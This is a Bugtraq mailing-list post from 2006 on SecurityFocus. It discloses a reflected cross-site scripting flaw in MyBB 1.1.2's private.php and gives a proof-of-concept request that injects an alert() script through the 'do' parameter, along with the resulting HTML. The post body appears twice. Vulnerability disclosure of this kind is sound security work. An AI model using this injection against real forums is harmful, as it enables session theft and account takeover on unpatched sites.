Threat level definition
Search:
Home
Bugtraq
Vulnerabilities
Mailing Lists
Jobs
Tools
Beta Programs
News
Infocus
Foundations
Microsoft
Unix
IDS
Incidents
Virus
Pen-Test
Firewalls
Columnists
Mailing Lists
Newsletters
Bugtraq
Focus on IDS
Focus on Linux
Focus on Microsoft
Forensics
Pen-test
Security Basics
Vuln Dev
Vulnerabilities
Jobs
Job Opportunities
Resumes
Job Seekers
Employers
Tools
RSS
News
Vulns
Security Research
BugTraq
Back to list
|
Post reply
MyBB 1.1.2 New XSS
Jun 06 2006 07:21AM
o y 6 hotmail com
// MyBB 1.1.2 New XSS
File :- private.php
Ver. :- $do = $mybb->input['do'];
Line :- 260
Action :- Preview
HTTP Proof :-
/mybb/private.php?to=asda&subject=asd%3E&font=-&size=-&color=-&mode=adva
nced&message=sd&options%5Bsavecopy%5D=yes&options%5Breadreceipt%5D=yes&a
ction=do_send&pmid=&do=D3vil-0x1%22%3E%3Cscript%3Ealert(1);%3C/script%3E
&preview=Preview
// Code
<input type="hidden" name="do" value="D3vil-0x1"><script>alert(1);</script>" />
//
[ reply ]
Privacy Statement
Copyright 2009, SecurityFocus
File :- private.php
Ver. :- $do = $mybb->input['do'];
Line :- 260
Action :- Preview
HTTP Proof :-
/mybb/private.php?to=asda&subject=asd%3E&font=-&size=-&color=-&mode=adva
nced&message=sd&options%5Bsavecopy%5D=yes&options%5Breadreceipt%5D=yes&a
ction=do_send&pmid=&do=D3vil-0x1%22%3E%3Cscript%3Ealert(1);%3C/script%3E
&preview=Preview
// Code
<input type="hidden" name="do" value="D3vil-0x1"><script>alert(1);</script>" />
//
[ reply ]